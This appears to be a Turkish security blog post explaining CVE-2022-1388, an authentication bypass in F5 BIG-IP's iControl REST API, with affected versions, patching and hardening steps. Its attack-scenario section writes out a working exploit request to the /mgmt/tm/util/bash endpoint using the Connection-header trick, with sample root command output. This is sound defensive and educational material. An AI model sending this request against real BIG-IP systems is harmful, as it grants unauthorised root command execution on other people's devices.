CVE-2022-1388: F5 BIG-IP iControl REST API'de Kritik Kimlik Doğrulama Atlama Açığı

CVE-2022-1388: F5 BIG-IP iControl REST API'de Kritik Kimlik Doğrulama Atlama Açığı

Genel Bakış 

CVE-2022-1388, F5 BIG-IP'in iControl REST API arayüzündeki kritik bir kimlik doğrulama atlama zafiyetidir. Bu açık, saldırganların yetkisiz bir şekilde BIG-IP cihazlarında yönetici komutları çalıştırmasına ve sistemin tamamen ele geçirilmesine yol açabilir. CVSS 9.8 (KRİTİK) puanına sahip olan bu zafiyet, düşük saldırı karmaşıklığı ve yüksek etki seviyesi nedeniyle büyük bir tehdit oluşturmaktadır.

Etkilenen Sürümler 

  • 16.1.x16.1.2.2 öncesi
  • 15.1.x15.1.5.1 öncesi
  • 14.1.x14.1.4.6 öncesi
  • 13.1.x13.1.5 öncesi
  • 12.1.x ve 11.6.x → Tüm sürümler (Destek dışı)

Teknik Detaylar 

Bu zafiyet, iControl REST API'deki hatalı kimlik doğrulama mekanizmasından kaynaklanmaktadır. Saldırganlar, özel olarak hazırlanmış HTTP istekleri göndererek kimlik doğrulamayı atlayabilir ve uzaktan kod çalıştırma (RCE), yapılandırma değişiklikleri veya hassas verilere yetkisiz erişim sağlayabilir.

Saldırı Vektörü

Saldırgan, BIG-IP yönetim arayüzüne (genellikle 443 veya 8443 portu) manipüle edilmiş bir HTTP isteği göndererek bu açıktan yararlanabilir. Özellikle Host başlığının değiştirilmesi veya kimlik doğrulama başlıklarının atlanması, yetkisiz erişime izin verebilir.

Örnek Saldırı Senaryosu

  1. Zafiyetli BIG-IP Sisteminin Tespiti
    Saldırgan, Shodan veya Censys gibi araçlarla internete açık BIG-IP yönetim arayüzlerini tarar.

  2. Zararlı İsteğin Hazırlanması
    Kimlik doğrulamayı atlamak için aşağıdaki gibi bir POST isteği gönderilir:

    POST /mgmt/tm/util/bash HTTP/1.1
    Host: hedef-sistem
    Connection: keep-alive, X-F5-Auth-Token
    Authorization: Basic 
    Content-Type: application/json
    
    {
       "command": "run",
       "utilCmdArgs": "-c 'id'"
    }
    • Connection: keep-alive, X-F5-Auth-Token başlığı kimlik doğrulamayı atlatmaya yardımcı olur.
    • util/bash endpoint'i komut çalıştırmaya izin verir.
  3. Uzaktan Kod Çalıştırma (RCE)
    Başarılı olursa, sunucu komut çıktısını döndürür (örneğin, id komutu):

    {
       "command": "run",
       "utilCmdArgs": "-c 'id'",
       "commandResult": "uid=0(root) gid=0(root) groups=0(root)"
    }

    Saldırgan, bu aşamadan sonra ters kabuk (reverse shell) bağlantısı kurarak sistemi tamamen ele geçirebilir.

Önlemler ve Düzeltmeler

Acil Eylemler

  1. F5 BIG-IP'i Güncelleyin
    Aşağıdaki sürümlere yükseltin:

    • 16.1.2.2 veya üzeri
    • 15.1.5.1 veya üzeri
    • 14.1.4.6 veya üzeri
    • 13.1.5 veya üzeri
  2. Yönetim Arayüzüne Erişimi Kısıtlayın

    • Güvenlik duvarı kurallarıyla 443 ve 8443 portlarını dış erişime kapatın.
    • Ağ segmentasyonu kullanarak erişimi sınırlandırın.
  3. F5’in Geçici Çözümünü Uygulayın
    iControl REST erişimini devre dışı bırakın veya IP kısıtlaması ekleyin:

    tmsh modify /sys httpd all-properties remote-host allowed none

Uzun Vadeli Güvenlik Önlemleri

  • Saldırı Girişimlerini İzleyin
    REST API isteklerini loglayarak şüpheli aktiviteleri tespit edin.
  • Çok Faktörlü Kimlik Doğrulama (MFA) Ekleyin
    Yönetim paneline ek güvenlik katmanları ekleyin.
  • BIG-IP Yapılandırmalarını Düzenli Olarak Denetleyin
    Yetkisiz değişiklikleri tespit etmek için periyodik kontroller yapın.

Sonuç

CVE-2022-1388, F5 BIG-IP cihazlarının tamamen ele geçirilmesine yol açabilecek kritik bir zafiyettir. Şirketlerin en kısa sürede yamaları uygulaması, yönetim arayüzlerini güvence altına alması ve olası saldırıları izlemesi gerekmektedir. Bu açık, aktif olarak istismar edildiğinden, acil önlem alınması şarttır.




Yorum Gönder

Daha yeni Daha eski

İletişim Formu